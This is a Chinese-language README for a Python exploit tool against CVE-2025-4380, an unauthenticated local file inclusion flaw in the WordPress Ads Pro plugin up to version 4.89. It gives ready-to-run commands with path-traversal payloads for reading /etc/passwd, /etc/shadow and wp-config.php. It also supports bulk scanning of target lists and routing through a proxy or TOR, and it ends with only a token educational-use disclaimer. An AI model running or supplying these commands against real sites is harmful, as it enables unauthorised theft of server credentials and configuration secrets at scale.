本文详细介绍了针对WordPress Ads Pro插件≤4.89版本的本地文件包含漏洞(CVE-2025-4380)的Python利用工具,包含单目标与批量利用方法、代理支持及实际利用示例。
CVE-2025-4380 - Ads Pro插件 <= 4.89 - 本地文件包含(LFI)漏洞利用
描述
此Python漏洞利用工具针对WordPress的Ads Pro插件≤4.89版本,通过bsa_preview_callback AJAX操作存在**本地文件包含(LFI)**漏洞。
未经身份验证的攻击者可利用此漏洞读取服务器文件系统中的任意文件,包括敏感文件如/etc/passwd、wp-config.php等。
漏洞利用特性
- 利用CVE-2025-4380 LFI漏洞
- 支持单目标或批量利用
- 可选将输出保存至文件
- 支持HTTP代理或TOR路由
- 重试机制确保可靠性
使用方法
单目标
1
|
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
|
多目标(批量扫描)
1
|
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
|
保存输出到文件
1
|
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
|
使用代理(如Burp、TOR)
1
|
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
|
参数说明
| 参数 |
描述 |
必选 |
-u, --url |
目标URL(如http://target.com) |
可选 |
-l, --list |
包含目标URL列表的文件 |
可选 |
-p, --path |
要包含的文件路径(如../../etc/passwd) |
是 |
-o, --output |
保存结果的输出文件 |
可选 |
--proxy |
代理(如http://127.0.0.1:8080) |
可选 |
示例

Burpsuite请求/响应

漏洞参考
- CVE-2025-4380
- Ads Pro插件 <= 4.89 - 通过bsa_preview_callback中的bsa_template实现本地文件包含
⚠️ 免责声明
此漏洞利用工具仅用于教育目的和授权的安全测试。
官方渠道